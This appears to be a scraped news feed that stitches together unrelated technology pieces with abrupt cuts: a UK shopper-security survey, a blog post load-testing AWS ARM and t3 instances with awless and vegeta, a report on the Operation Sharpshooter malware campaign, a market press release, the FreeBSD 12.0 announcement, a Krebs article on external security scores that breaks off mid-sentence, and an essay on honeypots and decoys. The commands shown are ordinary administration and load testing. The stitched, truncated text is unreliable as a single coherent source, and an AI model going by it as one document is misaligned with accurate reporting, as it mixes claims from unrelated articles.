IT professionals in the UK named unpatched security vulnerabilities as the main source of an attack (28%), followed by consumer/end-user error (25%), vulnerabilities in the supply chain (22%), and unprotected internet-connected devices (21%).

When holiday shopping, delivery is the biggest point of concern for UK consumers (55%), followed by ID fraud (16%), data security (13%) and website crashing (13%).

Some 48% of UK consumers said they were only “somewhat” or “not at all” aware of the data being collected through store loyalty cards, while only 34% claimed to trust retailers to hold their personal data.

“It is interesting that so few consumers around the world are actively concerned with the protection of their own data when shopping online, particularly when two-thirds of those we surveyed had little trust in how retailers held that data,” said Cox.

“More education is clearly required about the risks that online shoppers face, especially over Christmas, and the steps they can take to better protect their own data and identity from those intent on theft and fraud.”

Experimenting with AWS's new a1 instances with awless

$
0
0

There is a time and place for repeatable infrastructure builds. I wouldn’t want anything to get to production without being terraformed/cloudformationed/etc.

However, there’s also a time and place for tinkering, experimenting, “hacking around”, and for that, “infrastructure as code” is often overkill.

Many times, the AWS console is a great place to start pointing and clicking your way to victory. That gets annoying, quickly, though, if you’re doing a bunch of things that are similar but not identical; and it can also take a lot of clicks to discover information you need. The command line is an excellent middle ground.

Quick discoverability; typing CLI commands can be a lot faster than traveling through several console screens and picking the right rows from dropdowns. Easy to copy/tweak/paste for light repeatability.

AWS’s own CLI is pretty solid, and they are working on a v2 version to improve usability. But there’s already a usability-focused AWS CLI tool available: awless .

The Goal: Experiment with a1 instances

AWS just announced an ARM-based computing platform: Graviton.

You can read about them in an AWS Blog Post or on the site of the always impressive James Hamilton .

I’ve personally been watching ARM in the datacenter for a long time. In the web hosting world it seemed very interesting having more / cheaper / lower power CPUs could be a nice way to provide a better quality of service per customer in spite of ‘noisy neighbors’, and the investment in ARM for mobile meant the effective compute power per watt was increasing rapidly as the desire for mobile power exploded. I also have used linux on ARM quite a bit with the Raspberry Pi. So, when they were announced, I was curious to play!

Because ARM uses a “reduced instruction set” vs the x86 “complex instruction set”, it’s difficult to compare performance directly, because what’s done in a single instruction can vary. I’d been looking for a quick way to generate a lot of HTTP load inside a private VPC subnet. That seemed like a good workload to compare where the actual question of “how much work can you get done, how quickly” ends up being measurable. How many requests/second can be generated before the host gets unstable?

I chose caddy for the web server, because it’s a single simple binary and performs well, and vegeta for load generation for the same reasons. (Also, I have a history of vegeta love.)

Launch a server with awless

Ok, we’re tinkering, let’s get started. How do you create an instance? Luckily the self-documentation game is strong.

$ awless create instance -h

You can provide any params you want on the command line, and fill in other required ones interactively (with tab completion!). I was stuck needing to pick a good subnet and security group, though. This is easy:



From right in the terminal I can see which subnets are public and which aren’t. Running awless show <identifier>, like awless show subnet-46fc311e, gives more information about things if needed. But I’m tinkering, and this is a scratch account; I just need a public subnet, and I’ve only got my default security group.

You may note the redacted box; that is my home IP, which is allowed to SSH into that security group. That’s a leftover from a previous tinkering session with awless ; when I tried to ssh in, it couldn’t connect, and very helpfully suggested I may want to punch in a hole for myself with the following command. Notably, it figured out what my public facing IP was, and what the proper security group for the host I was connecting to was. It’s hard to imagine being more tinkering friendly than that.

$ awless update securitygroup id=sg-9082dee9 inbound=authorize protocol=tcp cidr=XX.YY.ZZ.QQ/32 portrange=22

I also needed to create a keypair for this account. That’s easy too:

$ awless create keypair name=mykey

The only place I had to go to the console was to find the proper AMI for an ARM host, but since that feature just launched, it’s probably ok that it’s not built in yet!

Now I can launch a host:

$ awless create instance type=a1.medium image=ami-0f8c82faeb08f15da subnet=subnet-46fc311e securitygroup=sg-9082dee9 keypair=mykey name=sledgehammer

Once it comes up, there’s a handy ssh capability, as well. As noted above, it’s smart enough to even recommend security groups, but it can also use jump boxes, guess the right username to use, and more.

$ awless ssh sledgehammer -i mykey

Get ready to load test

Sweet! So, for an ARM binary, I needed to request a custom build from caddy’s site, which ended up downloading locally, not on my fancy new host. Ok, now I need to scp… which means I need my IP address, and PEM file, things which awless had been handling for me. The IP address is easy to get with awless list instances , and it turns out, PEM files are stored by default in ~/.awless/keys/ .

$ scp -i ~/.awless/keys/joshkey.pem caddy ec2-user@54.167.228.17:

The other tools I need are a quick install or download/unpack away:

$ awless ssh sledgehammer -i mykey
$ sudo yum -y install tmux htop
$ wget https://github.com/tsenart/vegeta/releases/download/cli%2Fv12.1.0/vegeta-12.1.0-linux-arm64.tar.gz
$ tar -zxvf vegeta-12.1.0-linux-arm64.tar.gz

And, I wanted to let the machine work as hard as possible, with no chance of file descriptors becoming a bottleneck, so I added a few lines to /etc/security/limits.conf .

ec2-user soft nofile 900000
ec2-user hard nofile 1000000

I’m using tmux here to keep any load tests running even if my ssh connection drops, and also to provide “virtual terminals.”

One window to run caddy as a webserver
One window to run vegeta as a load generator
One window to run htop, as it’s a very handy core-aware interface for quickly seeing if the host is really pegged, and if so, what’s doing it.

tmux in 10 seconds

There is a special hotkey which you use to tell tmux you’re giving it a command. By default, it’s Control-b. To start using tmux, run tmux. To connect to a session already in progress, you attach to it (tmux a). Once inside a tmux, you can create a new “window” with the hotkey, then c (default: Control-b, then c). You can navigate between windows a few ways, but I usually use Control-b, p(revious) and Control-b, n(ext).

Run the load test

I create 3 tmux windows, for htop, ./caddy, and vegeta. Vegeta’s command line is also very composable and great for tweaking and playing with. I send in the URL (which caddy will serve), define the features of the ‘attack’, then dump out a report of the data.

$ echo "GET http://localhost:2015/README.md" | ./vegeta attack -duration=30s -workers=10 -rate=50 | tee results.bin | ./vegeta report

The README.md shipped with the vegeta tarball, so it seemed like a reasonable file to use for the test. Use what you have.

I played around with the -workers and -rate settings by hand this time, though I have automated it before.
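Rather than hand-editing each run, a small sweep loop makes the binary search less tedious (a sketch; the rate list is arbitrary):

for rate in 500 1000 1500 2000 2500 3000; do
  echo "=== rate: $rate ==="
  # keep only the request totals and latency percentiles from each report
  echo "GET http://localhost:2015/README.md" | \
    ./vegeta attack -duration=30s -workers=10 -rate=$rate | ./vegeta report | grep -E '^(Requests|Latencies)'
done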

Finally, after some manual binary searching, the setting which ‘broke’ it was: -workers=10 -rate=2500 .

Requests      [total, rate]            13168, 1270.38
Duration      [total, attack, wait]    17.211569325s, 10.36538365s, 6.846185675s
Latencies     [mean, 50, 95, 99, max]  3.050666636s, 3.186014712s, 6.150334217s, 6.950259063s, 9.812459568s
Bytes In      [total, mean]            251087424, 19068.00
Bytes Out     [total, mean]            0, 0.00
Success       [ratio]                  100.00%
Status Codes  [code:count]             200:13168
Error Set:

I asked for 2500 requests per second, and yet it was only able to generate 1270. You can also see that the latencies for the requests, usually in the 20-100ms range in earlier tests, are seconds. This machine is giving all it has to give.

So, I’m calling that the number for now: 1270 rps . Let’s see how the other team does.

Time to kill the server and stop paying … tiny fractions of a penny per minute for it! awless has our backs, of course.

$ awless delete instance ids=@sledgehammer
delete instance i-071ca8ea62f607dfe
Confirm (region: us-east-1)? [y/N] y
[info] OK delete instance

Comparison test with t3 instances

Looking at ec2instances.info the most comparable machine to the a1.medium is probably a t3.small .

(Spec comparison table of the a1.medium vs. t3 instances omitted.)

So, I know I need to do some of the same things again when I spin the new host up … and maybe I’ll want to test on some low end c’s and m’s as well. It’s not hard to make a small script that gets run at machine creation via userdata.

Pop this into setup.sh :

#!/bin/bash
yum -y install tmux htop
cd ~ec2-user
wget https://github.com/tsenart/vegeta/releases/download/cli%2Fv12.1.0/vegeta-12.1.0-linux-amd64.tar.gz
tar -zxvf vegeta-12.1.0-linux-amd64.tar.gz
wget https://caddyserver.com/download/linux/amd64?license=personal\&telemetry=on -O caddy.tar.gz
tar -zxvf caddy.tar.gz
cat >>/etc/security/limits.conf <<EOF
ec2-user soft nofile 900000
ec2-user hard nofile 1000000
EOF

I feel compelled to say that yes, downloading tarballs without checking their checksums, untarring them into a home directory, and running them from a shell are all bad things that one should never consider for production. But also, it’s wonderfully liberating to know that this machine will have a new home in /dev/null in literally minutes; if it gets me where I need to go faster, anything goes.

Bringing up a t3.small is now trivial:

$ awless create instance type=t3.small subnet=subnet-46fc311e securitygroup=sg-9082dee9 keypair=mykey name=t3small userdata=setup.sh

Within about 45 seconds I’m able to ssh in and begin the testing, no other tweaking required.

So, doing the exact same tests, what are the results?

[ec2-user@ip-172-31-19-157 ~]$ echo "GET http://localhost:2015/README.md" | ./vegeta attack -duration=30s -workers=20 -rate=5000 | tee results.bin | ./vegeta report
Requests      [total, rate]            150000, 4988.30
Duration      [total, attack, wait]    30.076498082s, 30.070365154s, 6.132928ms
Latencies     [mean, 50, 95, 99, max]  27.77611ms, 22.313409ms, 69.037507ms, 109.292859ms, 230.308868ms
Bytes In      [total, mean]            2860200000, 19068.00
Bytes Out     [total, mean]            0, 0.00
Success       [ratio]                  100.00%
Status Codes  [code:count]             200:150000
Error Set:

The t3.small only hits the CPU redline, and starts to deliver fewer requests/sec than asked for, at 5000 rps, and even then it still manages to deliver 4988 rps, or 3.9x more than the a1.medium.

This means that even if it’s only running at 40% capacity after the burst window, it would still likely push out 1995 rps, still 1.5x more than the a1.

Interestingly, I tried the same test on a t3.micro (which just required a re-run of the previous command with different variables), and got almost identical results, though the credit cliff might be steeper.

Conclusions

I really can’t ‘conclude’ much; this test was tinkering-grade, not science or anything close to it. But I do suspect that right now in AWS, you can generate more brute-force load-testing requests/second/dollar on Intel than you can on ARM. This being a heavily CPU-bound task, that’s in line with what even AWS says about these instances. It’s still an impressive first outing and I’ll be excited to see what other people do with them. There may be workloads with a different CPU / waiting-for-I/O ratio where they’d comparatively shine. They also come with higher-performance networking than the t3s, which would be interesting to test. Perhaps when load testing across the network, the performance gap would shrink?

Hopefully you’ll share my conclusion that awless is a useful tool to have in the toolbox, especially for quickly creating and disposing of machines and other basic infrastructure. It fits very nicely in between “not worth terraforming yet” and “too annoying to use the console for.”

Operation Sharpshooter Takes Aim at Global Critical Assets


Operation Sharpshooter uses a new implant to target mainly English-speaking nuclear, defense, energy and financial companies.

Researchers have detected a widespread reconnaissance campaign using a never-before-seen implant framework to infiltrate global defense and critical infrastructure players ― including nuclear, defense, energy and financial companies.

The campaign, dubbed Operation Sharpshooter, began Oct. 25, when a wave of malicious documents was sent via Dropbox. The campaign’s implant has since appeared in 87 organizations worldwide, predominantly in the U.S. and other English-speaking countries.



“Our discovery of a new, high-function implant is another example of how targeted attacks attempt to gain intelligence,” said Ryan Sherstobitoff and Asheer Malhotra of McAfee, in a Wednesday analysis .

They added that the malware takes several steps to unfold. The initial attack vector is a document that contains a weaponized macro. Once downloaded, it places embedded shellcode into the memory of Microsoft Word, which acts as a simple downloader for a second-stage implant. This next stage runs in memory and gathers intelligence.

“The victim’s data is sent to a control server for monitoring by the actors, who then determine the next steps,” the researchers said. They added that this could be a recon effort for a larger campaign down the road.

The documents, which contained English-language job descriptions for positions “at unknown companies,” were loaded with Korean-language metadata indicating that they were created with a Korean version of Microsoft Word.

Rising Sun

That second-stage implant is a fully modular backdoor dubbed Rising Sun that performs reconnaissance on the victim’s network, according to the research.



Notably, Rising Sun uses source code from the Duuzer backdoor , malware first used in a 2015 campaign targeting the data of South Korean organizations, mainly in manufacturing. Duuzer, which is designed to work with both 32-bit and 64-bit Windows versions, opens a back door through which bad actors can gather system information.

In this situation, the Rising Sun implant gathers and encrypts data from the victim, and fetches the victim devices’ computer name, IP address data, native system information and more.

While the second-stage implant is downloading, the control server also downloads another OLE document which researchers say is “probably benign, used as a decoy to hide the malicious content.”

Lazarus False Attribution

Researchers noted several characteristics of the campaign that linked it to the Lazarus Group, but suspected that the clues were purposefully planted as false flags to connect the two.

For instance, Rising Sun is similar to the Lazarus Group’s Duuzer implant; however, the two have key differences, including their communication methods, the command codes used and their encryption schemes.

“Operation Sharpshooter’s numerous technical links to the Lazarus Group seem too obvious to immediately draw the conclusion that they are responsible for the attacks, and instead indicate a potential for false flags,” researchers said. “Our research focuses on how this actor operates, the global impact, and how to detect the attack. We shall leave attribution to the broader security community.”

Global Software-defined Perimeter Market 2019-2023 | 34% CAGR Projection Over th ...


LONDON (BUSINESS WIRE) #ITSecurity The global software-defined perimeter market is expected to post a CAGR of over 34% during the period 2019-2023, according to the latest market research report by Technavio .



A key factor driving the growth of the market is the increase in network attacks across the globe. Network attacks by hackers and cybercriminals are growing at an alarming rate; the number of attacks such as DDoS, man-in-the-middle, and APTs is rising globally. For instance, almost one-third of enterprises faced a DDoS attack in 2017. In another example, in January 2018 the Dutch bank ABN AMRO faced a DDoS attack, and as a result services such as internet banking and mobile banking were unavailable or extremely slow for more than 4 hours. SDP supports enterprises in permitting good connections or packets and in dropping bad packets or connections. In the case of a network attack, SDP blocks malicious traffic and automates the process of stopping that traffic immediately from reaching services and applications. Thus, the increase in network attacks across the globe is expected to drive the growth of the global SDP market during the forecast period.

This market research report on the global software-defined perimeter market also provides an analysis of the most important trends expected to impact the market outlook during the forecast period. Technavio classifies an emerging trend as a major factor that has the potential to significantly impact the market and contribute to its growth or decline.

This report is available at a USD 1,000 discount for a limited time only: View market snapshot before purchasing

In this report, Technavio highlights the emergence of BYOD as one of the key emerging trends in the global software-defined perimeter market:

Global software-defined perimeter market: Emergence of BYOD

Organizations are increasingly adopting smartphones and tablets to enable employees to work remotely. A large number of employees now stay connected with the corporate network with constant support from enterprise IT departments. The adoption of the BYOD concept by firms has allowed employees to access organizational data and resources without being tied to a single location. Mobile devices are now becoming primary devices among employees in an organization. SMEs are increasingly shifting to BYOD for professional tasks, and this move has helped them in improving their productivity and efficiency significantly. However, enterprises face a challenge in controlling the BYOD devices. SDP provides enterprises with policies that help them in limiting access to specific resources and information. It also provides a low cost of ownership and flexibility through its user-friendly and secure environment. This is encouraging enterprises to adopt SDP to make the BYOD networking systems more robust and secure.

“Apart from the emergence of BYOD, the rise in the number of strategic alliances, the use of SDP with blockchain for improving automotive cybersecurity, and the growing use of IoT are some other factors,” says a senior analyst at Technavio for research on IT security.

Global software-defined perimeter market: Segmentation analysis

This market research report segments the global software-defined perimeter market by geographical region, covering APAC, EMEA, and the Americas.

The Americas led the market in 2018 with a market share close to 43%, followed by APAC and EMEA respectively. However, during the forecast period, the APAC region is expected to register the highest incremental growth, followed by the EMEA region.

Looking for more information on this market? Request a free sample report

Technavio’s sample reports are free of charge and contain multiple sections of the report, such as the market size and forecast, drivers, challenges, trends, and more.

Some of the key topics covered in the report include:

Market Landscape: market ecosystem; market characteristics; market segmentation analysis

Market Sizing: market definition; market size and forecast

Five Forces Analysis

Market Segmentation

Geographical Segmentation: regional comparison; key leading countries

Market Drivers

Market Challenges

Market Trends

Vendor Landscape: vendors covered; vendor classification; market positioning of vendors; competitive scenario

About Technavio

Technavio is a leading global technology research and advisory company. Their research and analysis focuses on emerging market trends and provides actionable insights to help businesses identify market opportunities and develop effective strategies to optimize their market positions.

With over 500 specialized analysts, Technavio’s report library consists of more than 10,000 reports and counting, covering 800 technologies, spanning 50 countries. Their client base consists of enterprises of all sizes, including more than 100 Fortune 500 companies. This growing client base relies on Technavio’s comprehensive coverage, extensive research, and actionable market insights to identify opportunities in existing and potential markets and assess their competitive positions within changing market scenarios.

If you are interested in more information, please contact our media team at media@technavio.com.

Contacts

Technavio Research
Jesse Maida
Media & Marketing Executive
US: +1 844 364 1100
UK: +44 203 893 3200
www.technavio.com

FreeBSD 12.0-RELEASE Announcement


The FreeBSD Release Engineering Team is pleased to announce the availability of FreeBSD 12.0-RELEASE. This is the first release of the stable/12 branch.

Some of the highlights:

OpenSSL has been updated to version 1.1.1a (LTS).

Unbound has been updated to version 1.8.1, and DANE-TA has been enabled by default.

OpenSSH has been updated to version 7.8p1.

Additional capsicum(4) support has been added to sshd(8).

Clang, LLVM, LLD, LLDB, compiler-rt and libc++ have been updated to version 6.0.1.

The vt(4) Terminus BSD Console font has been updated to version 4.46.

The bsdinstall(8) utility now supports UEFI+GELI as an installation option.

The VIMAGE kernel configuration option has been enabled by default.

The NUMA option has been enabled by default in the amd64 GENERIC and MINIMAL kernel configurations.

The netdump(4) driver has been added, providing a facility through which kernel crash dumps can be transmitted to a remote host after a system panic.

The vt(4) driver has been updated with performance improvements, drawing text at rates ranging from 2- to 6-times faster.

Various improvements to graphics support for current generation hardware.

Support for capsicum(4) has been enabled on armv6 and armv7 by default.

The UFS/FFS filesystem has been updated to consolidate TRIM/BIO_DELETE commands, reducing read/write requests due to fewer TRIM messages being sent simultaneously.

The NFS version 4.1 server has been updated to include pNFS server support.

The pf(4) packet filter is now usable within a jail(8) using vnet(9).

The bhyve(8) utility has been updated to add NVMe device emulation.

The bhyve(8) utility is now able to be run within a jail(8).

Various Lua loader(8) improvements.

KDE has been updated to version 5.12.5.

And more...

For a complete list of new features and known problems, please see the online release notes and errata list, available at:

https://www.FreeBSD.org/releases/12.0R/relnotes.html

https://www.FreeBSD.org/releases/12.0R/errata.html

For more information about FreeBSD release engineering activities, please see:

https://www.FreeBSD.org/releng/

Availability

FreeBSD 12.0-RELEASE is now available for the amd64, i386, powerpc, powerpc64, powerpcspe, sparc64, armv6, armv7, and aarch64 architectures.

FreeBSD 12.0-RELEASE can be installed from bootable ISO images or over the network. Some architectures also support installing from a USB memory stick. The required files can be downloaded as described in the section below.

SHA512 and SHA256 hashes for the release ISO, memory stick, and SD card images are included at the bottom of this message.
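Before writing an image to media, it is worth verifying the download against the published hash. As a rough sketch (not part of the announcement itself), the SHA256 value can be checked with a few lines of Python; the filename and digest below are placeholders:

import hashlib

# Placeholders: substitute the image you actually downloaded and the SHA256
# digest published at the bottom of the announcement.
IMAGE = "FreeBSD-12.0-RELEASE-amd64-disc1.iso"
EXPECTED = "replace-with-published-sha256-digest"

h = hashlib.sha256()
with open(IMAGE, "rb") as f:
    for chunk in iter(lambda: f.read(1 << 20), b""):  # hash in 1 MiB chunks
        h.update(chunk)

print("OK" if h.hexdigest() == EXPECTED else "MISMATCH", h.hexdigest())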

PGP-signed checksums for the release images are also available at:

https://www.FreeBSD.org/releases/12.0R/signatures.html

A PGP-signed version of this announcement is available at:

https://www.FreeBSD.org/releases/12.0R/announce.asc

The purposes of the images provided as part of the release are as follows:

dvd1

This contains everything necessary to install the base FreeBSD operating system, the documentation, debugging distribution sets, and a small set of pre-built packages aimed at getting a graphical workstation up and running. It also supports booting into a "livefs" based rescue mode. This should be all you need if you can burn and use DVD-sized media.

Additionally, this can be written to a USB memory stick (flash drive) for the amd64 architecture and used to do an install on machines capable of booting off USB drives. It also supports booting into a "livefs" based rescue mode.

As one example of how to use the memstick image, assuming the USB drive appears as /dev/da0 on your machine, something like this should work:

# dd if=FreeBSD-12.0-RELEASE-amd64-dvd1.iso of=/dev/da0 bs=1m conv=sync

Be careful to make sure you get the target (of=) correct.

disc1

This contains the base FreeBSD operating system. It also supports booting into a "livefs" based rescue mode. There are no pre-built packages.

Additionally, this can be written to a USB memory stick (flash drive) for the amd64 architecture and used to do an install on machines capable of booting off USB drives. It also supports booting into a "livefs" based rescue mode. There are no pre-built packages.

As one example of how to use the memstick image, assuming the USB drive appears as /dev/da0 on your machine, something like this should work:

# dd if=FreeBSD-12.0-RELEASE-amd64-disc1.iso of=/dev/da0 bs=1m conv=sync

Be careful to make sure you get the target (of=) correct.

bootonly

This supports booting a machine using the CDROM drive but does not contain the installation distribution sets for installing FreeBSD from the CD itself. You would need to perform a network based install (e.g., from an HTTP or FTP server) after booting from the CD.

Additionally, this can be written to a USB memory stick (flash drive) for the amd64 architecture and used to do an install on machines capable of booting off USB drives. It also supports booting into a "livefs" based rescue mode. There are no pre-built packages.

As one example of how to use the memstick image, assuming the USB drive appears as /dev/da0 on your machine, something like this should work:

# dd if=FreeBSD-12.0-RELEASE-amd64-bootonly.iso of=/dev/da0 bs=1m conv=sync

Be careful to make sure you get the target (of=) correct.

memstick

Scanning for Flaws, Scoring for Security


Is it fair to judge an organization’s information security posture simply by looking at its Internet-facing assets for weaknesses commonly sought after and exploited by attackers, such as outdated software or accidentally exposed data and devices? Fair or not, a number of nascent efforts are using just such an approach to derive security scores for companies and entire industries. What’s remarkable is how many organizations don’t make an effort to view their public online assets as the rest of the world sees them ― until it’s too late.



Image: US Chamber of Commerce.

For years, potential creditors have judged the relative risk of extending credit to consumers based in part on the applicant’s credit score ― the most widely used being the score developed by FICO , previously known as Fair Isaac Corporation . Earlier this year, FICO began touting its Cyber Risk Score (PDF), which seeks to measure an organization’s chances of experiencing a data breach in the next 12 months, based on a variety of measurements tied to the company’s public-facing online assets.

In October, FICO teamed up with the U.S. Chamber of Commerce to evaluate more than 2,500 U.S. companies with the Cyber Risk Score, and then invited these companies to sign up and see how their score compares with that of other organizations in their industry. The stated use cases for the Cyber Risk Score include the potential for cyber insurance pricing and underwriting, and evaluating supply chain risk (i.e., the security posture of vendor partners).

The company-specific scores are supposed to be made available only to vetted people at the organization who go through FICO’s signup process. But in a marketing email sent to FICO members on Tuesday advertising its new benchmarking feature, FICO accidentally exposed the FICO Cyber Risk Score of energy giant ExxonMobil .

The marketing email was quickly recalled and reissued in a redacted version, but it seems ExxonMobil’s score of 587 puts it in the “elevated” risk category and somewhat below the mean score among large companies in the Energy and Utilities sector, which was 637. The October analysis by the Chamber and FICO gives U.S. businesses an overall score of 687 on a scale of 300-850.



Data accidentally released by FICO about the Cyber Risk Score for ExxonMobil.

How useful is such a score? Mike Lloyd , chief technology officer at RedSeal , was quoted as saying a score “taken from the outside looking in is similar to rating the fire risk to a building based on a photograph from across the street.”

“You can, of course, establish some important things about the quality of a building from a photograph, but it’s no substitute for really being able to inspect it from the inside,” Lloyd told Dark Reading regarding the Chamber/FICO announcement in October.

Naturally, combining external scans with internal vulnerability probes and penetration testing engagements can provide organizations with a much more holistic picture of their security posture. But when a major company makes public, repeated and prolonged external security foibles, it’s difficult to escape the conclusion that perhaps it isn’t looking too closely at its internal security either.

ENTIRELY, CERTIFIABLY PREVENTABLE

Too bad the errant FICO marketing email didn’t expose the current cyber risk score of big-three consumer credit bureau Equifax , which was relieved of personal and financial data on 148 million Americans last year after the company failed to patch one of its Web servers and then failed to detect an intrusion into its systems for months.

A 96-page report (PDF) released this week by a House oversight committee found the Equifax breach was “entirely preventable.” For 76 days beginning in mid-May 2017, the intruders made more than 9,000 queries on 48 Equifax databases.

According to the report, the attackers were able to move the data off of Equifax’s network undetected thanks to an expired security certificate. Specifically, “while Equifax had installed a tool to inspect network traffic for evidence of malicious activity, the expired certificate prevented that tool from performing its intended function of detecting malicious traffic.”

Expired certificates aren’t particularly rare or noteworthy, but when they persist in publicly-facing Web servers for days or weeks on end, it raises the question: Is anyone at the affected organization paying attention at all to security?
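Watching for this particular lapse is cheap to automate. As a minimal sketch (the hostnames are placeholders, and a real monitor would alert rather than print), Python's standard library can report how many days remain on a public server's certificate:

import socket
import ssl
from datetime import datetime, timezone

def days_until_expiry(host, port=443):
    """Return days remaining before the host's TLS certificate expires."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=10) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            cert = tls.getpeercert()
    # 'notAfter' looks like: 'Dec 13 12:00:00 2019 GMT'
    expires = datetime.strptime(cert["notAfter"], "%b %d %H:%M:%S %Y %Z")
    return (expires.replace(tzinfo=timezone.utc) - datetime.now(timezone.utc)).days

for host in ["example.com"]:  # placeholder: list your public-facing hosts here
    print(host, days_until_expiry(host), "days left")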

Given how damaging it was for Equifax to have an expired certificate, you might think the company would have done everything in its power to ensure this wouldn’t happen again. But it would happen again ― on at least two occasions earlier this year.

In April 2018, KrebsOnSecurity pointed out that the Web site Equifax makes available for consumers who wish to freeze their credit files was using an expired certificate, causing the site to throw up a dire red warning page that almost certainly scared countless consumers away from securing their credit files.

It took Equifax two weeks to fix that expired cert. A week later, I found another expired certificate on the credit freeze Web portal for the National Consumer Telecommunications and Utilities Exchange ― a consumer credit bureau operated by Experian.

ARE YOU EXPERIANSED?

One has to wonder what the median FICO Cyber Risk Score is for the credit bureau industry, because whatever Equifax’s score is, it can’t be too different from that of its top competitor ― Experian, which is no stranger to data breaches.

On Tuesday, security researcher @notdan tweeted about finding a series of open directories on Experian’s Web site. Open directories, in which files and folders on a Web server are listed publicly and clickable down to the last file, aren’t terribly uncommon to find exposed on smaller Web sites, but they’re not the sort of oversight you’d expect to see at a company with the size and sensitivity of Experian.



A directory listing that exposed a number of files on an Experian server.

Included in one of the exposed directories on the Experian server were dozens of files that appeared to be digital artifacts left behind by a popular Web vulnerability scanner known as Burp Suite . It’s unclear whether those files were the result of scans run by someone within the company, or if they were the product of an unauthorized security probe by would-be intruders that somehow got indexed by Experian’s

Deception: Honey vs. Real Environments


A primer on choosing deception technology that will provide maximum efficacy without over-committing money, time and resources.

Deception technology is offering defenders the ability to finally gain a rare advantage over adversaries by doing something that other forms of defense can't: provide early and accurate detection by planting a minefield of attractive decoys to trip up attackers. We've seen examples of this type of defense used by the FBI and other top law enforcement agencies to catch criminals such as child pornographers and, more recently, perpetrators of egregious financial theft.

Decoys are designed to catch early-stage activity as the adversary looks to understand the network and how to find its target. I call this early stage of an attack "casing the joint," and my research has shown that interrupting this stage, ultimately reducing the dwell time of a potential attack, is crucial to protecting data. Defenders can watch what is happening, learn more about the nature of the attack, and better understand the way that the attacker is moving through a network or even a cloud-based file share.

More organizations are starting to look at deception as a way to plug the gaps of existing deployed security solutions such as data loss prevention, encryption, access management, and user behavior analytics. But how can security teams determine which form of deception is the right one for their organizations? It's up to each organization to determine which deception approach makes the most sense for them.

Defining "Honey" Environments

Currently, most offerings in the deception market are focused on the buildout of complex honey environments, designed to lure attackers into fake systems to distract and track their behaviors.

A honeypot is a network-adjacent system set up to lure adversaries and to detect, deflect, or study hacking attempts. There are various types of honeypots, classified by the level of interaction they conduct with an intruder. When designed properly, honeypots are meant to prevent adversaries from accessing protected areas of an organization's operational network. A properly configured honeypot should have many of the same components of an organization's production system, especially data. Their most significant value is the information they can obtain on the behavior of the adversary and what the intent of the attacker is. Data that enters and leaves a honeypot allows security staff to gather information, such as the attacker's keystrokes or their attempted lateral moves throughout the fake honeypot system.
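To make the idea concrete, here is a toy low-interaction honeypot sketch; the port and fake SSH banner are hypothetical choices, and a production honeypot would be far more elaborate. The premise is simple: any connection to a port no legitimate user should ever touch is worth logging.

import logging
import socket

logging.basicConfig(filename="honeypot.log", level=logging.INFO,
                    format="%(asctime)s %(message)s")

PORT = 2222  # hypothetical decoy port; nothing legitimate listens here

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", PORT))
    srv.listen()
    while True:
        conn, addr = srv.accept()
        with conn:
            conn.sendall(b"SSH-2.0-OpenSSH_7.4\r\n")  # fake banner to invite interaction
            data = conn.recv(1024)  # capture the intruder's first bytes
            logging.info("connection from %s:%d, first bytes: %r", addr[0], addr[1], data)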

A honeynet is a network of multiple honeypots designed to simulate a real network. Essentially, they are large-scale network decoys that mimic a collection of typical servers that might be found on a business network. According to the SANS 2017 report, " The State of Honeypots: Understanding the Use of Honey Technologies Today ," "Honeynets connect and interact in the same way a real network would― none of the connections between systems are emulated." On a scale of 1 to 10, with 10 being the most effective, users of honeypots surveyed in this SANS report rated honeynets at 7.5 in terms of overall effectiveness. Like honeypots, the biggest value of a honeynet deployment is the intelligence security teams can gather on attacker behavior.

When properly built and maintained, honey environments can provide valuable information about how the attacker moves around in a network in search of data to exfiltrate. But only if the attacker enters the honeynet.

Honey Hardships

There are some significant challenges and shortcomings that make honey environments difficult to deploy, manage, and maintain. Before investing, you need to conduct a serious cost-benefit analysis.

First, while honey environments are built and maintained outside of the enterprise's operational environment, honeynets still require hackers to gain initial entry through the operational environment. Organizations must then hope that the breadcrumbs leading to the honey environment are convincing enough to actually lure the hacker. Also, once a hacker leaves the fake environment, there is no way of knowing if he or she re-enters the operational environment to continue an attack or what data they may have exfiltrated prior to tripping over a breadcrumb.

Second, the cost and resources required to create these environments can put a strain on security teams that are already overwhelmed by the number of security alerts and investigations they do on a daily basis. Organizations must establish an environment that mimics the operational environment in order to have any chance that attackers will believe it is real. Then, that environment must be maintained to keep it realistic. This level of investment and upkeep to make a honeynet work is no small commitment.

Third, there are limits to the usefulness of the data that honey environments can provide on adversaries. It's true that they are a good method for learning more about how attackers move throughout a system in search of data to steal, but they reveal little about the actual hacker and what happens to data once it has been stolen.

Finally, adversaries have become increasingly sophisticated in identifying "tells" in honey environments. Hackers who present any serious threat will often target specific IP addresses that they know are valid machines. If a hacker wants to identify any honeypots sitting on a corporate network (a process known as "fingerprinting"), it is easy to do because the machine will either have no outbound traffic, or the deceptive traffic will be contrived and not follow a normal usage pattern. For a honeynet to have any value, an intruder shouldn't be able to detect that he or she is on a fake system. The goal is to give the adversary a false sense of reality and a false sense of security that his or her actions are not being noticed or monitored.
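One mitigation for the "silent machine" tell is to give decoys a believable pulse of outbound traffic. A toy sketch follows, with hypothetical destinations and cadence; a real deployment would model the timing and destinations on the network's actual usage patterns:

import random
import time
import urllib.request

DESTINATIONS = ["https://example.com", "https://example.org"]  # placeholder sites

while True:
    url = random.choice(DESTINATIONS)
    try:
        urllib.request.urlopen(url, timeout=5).read(1024)  # small, ordinary-looking fetch
    except OSError:
        pass  # a decoy should shrug off transient network errors
    time.sleep(random.expovariate(1 / 600))  # roughly one request every 10 minutes, jittered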

Deception in the Real World

Deploying deception technology within operational and cloud environments allows security teams to detect and deceive attackers in the direct path to sensitive data instead of hoping they are lured away. Deployment of believable decoy documents inside operational networks provides all of the same benefits of honeypots and honeynets but negates the need to create and maintain fake environments.

Deception that does not depend on honey environments can also be used to proactively fight back against hackers and leakers. Attackers rely on various tools for anonymity, and these tools often contribute to the success of bold attacks. Deception techniques not limited by fake environments can be used to pierce these tools and reveal attackers, often without their knowledge. This provides a unique advantage for organizations and law enforcement to hold hackers and leakers accountable.

Trustworthy Network Segmentation for an Untrustworthy World

